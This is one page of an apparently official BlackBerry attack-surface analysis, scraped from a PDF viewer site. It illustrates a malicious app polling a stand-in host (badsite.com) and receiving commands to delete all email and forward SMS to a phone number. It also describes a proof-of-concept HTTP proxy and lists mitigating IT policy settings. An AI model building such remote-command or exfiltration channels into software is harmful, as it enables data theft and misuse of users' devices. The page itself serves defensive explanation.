Blackberry JAVA DEVELOPMENT ENVIRONMENT - - FUNDAMENTALS GUIDE Specifiche Scaricare il pdf (Pagina 29)

Attack Surface Analysis of BlackBerry Devices

Application sends:

http://www.badsite.com/whatnow?

Web site returns:

COMMAND=DELETE_ALL EMAIL

COMMAND=FORWARD_ALL SMS TO 0865550456

Application sends:

http://www.badsite.com/whatnow?Status=Email+Deleted&Status=SMS+Forwarding+ON

HTTP Proxy

A malicious application could use the BlackBerry device to proxy HTTP traffic or contact Web servers with

predefined content. Typically, a HTTP Proxy may be used to browse restricted, illegal or dubious Web sites,

or be utilized for denial of service attacks.

A proof-of-concept implementation used a HTTP

StreamConnection object to connect to a remote Web site,

and then marshalled the returned data to a third party (who had a listener socket running on a specified

port) via a TCP socket StreamConnection object. Note that your network provider must support full internet

access from the BlackBerry in order for this to be functional.

Such attacks will be traced back to the individual or corporation that owns the BlackBerry rather than the

actual attacker.

Mitigation

You can set the following options to mitigate the attacks outlined above. See Mitigation Strategies for more

information.

Data Theft

IT Policy "Allow External Connections" = False

Application Controls "External Domains" = [list of allowed domains]

"External Network Connections" = Not Permitted

Device Firewall Status = Enabled

Application Permissions Connections > Carrier Internet = Deny

Other Device Settings

1 2 ... 24 25 26 27 28 29 30 31 32 33 34 ... 38 39

Nessun commento

Blackberry JAVA DEVELOPMENT ENVIRONMENT - - FUNDAMENTALS GUIDE Specifiche Pagina 29